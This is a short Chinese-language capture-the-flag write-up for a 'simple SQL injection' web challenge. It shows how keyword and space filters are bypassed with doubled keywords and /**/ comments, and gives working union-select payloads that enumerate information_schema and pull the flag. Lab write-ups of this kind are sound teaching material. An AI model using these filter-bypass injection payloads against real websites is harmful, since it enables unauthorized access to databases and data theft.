实验吧-web-简单的sql注入

本系列文集:实验吧-Write up --将持续更新 觉得还不错请给个喜欢,感谢!

SQL注入详细讲解:
DVWA-SQL Injection(SQL注入)
SQL手工注入语句

简单的注入测试

1   正常
1'  无回显
1' or '1'='1    全部数据
测试过滤:
union select 
information_schema 
information_schema.tables 
information_schema.columns
table_schema
column_name
发现都被过滤了

重复输入union select后发现空格也被过滤了,用两个空格代替一个空格或用对注释符/**/绕过
1.查询当前数据库

1'  unionunion  selectselect  database()'  <两个空格>

1'/**/union/**/select/**/database()'

实验吧-web-简单的sql注入_第1张图片
图片.png

2.查询数据库中的表

1'  unionunion  selectselect  table_name  fromfrom  information_schema.tables  wherewhere  '1'='1   <两个空格>

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

实验吧-web-简单的sql注入_第2张图片
图片.png

发现flag表
3.查询flag表中字段名

1' unionunion  selectselect  column_namcolumn_namee  fromfrom  information_schema.coluinformation_schema.columnsmns  wherewhere  table_name='flag    <两个空格>

实验吧-web-简单的sql注入_第3张图片
图片.png

发现flag字段名
4.最后构造出poc

1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1
1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
实验吧-web-简单的sql注入_第4张图片
图片.png

你可能感兴趣的:(实验吧-web-简单的sql注入)